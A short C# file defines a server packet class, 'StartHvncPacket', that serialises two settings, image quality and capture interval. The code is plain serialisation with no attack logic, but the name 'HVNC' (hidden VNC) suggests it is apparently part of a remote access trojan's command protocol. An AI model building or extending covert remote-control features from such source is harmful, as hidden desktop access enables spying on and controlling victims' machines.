using System.IO;

namespace Crysome.Common.Network.Packets.Server;

public class StartHvncPacket : IPacket
{
	public int Quality { get; set; } = 80;

	public int IntervalMs { get; set; } = 100;

	public void Write(BinaryWriter w)
	{
		w.Write(Quality);
		w.Write(IntervalMs);
	}

	public void Read(BinaryReader r)
	{
		Quality = r.ReadInt32();
		IntervalMs = r.ReadInt32();
	}
}
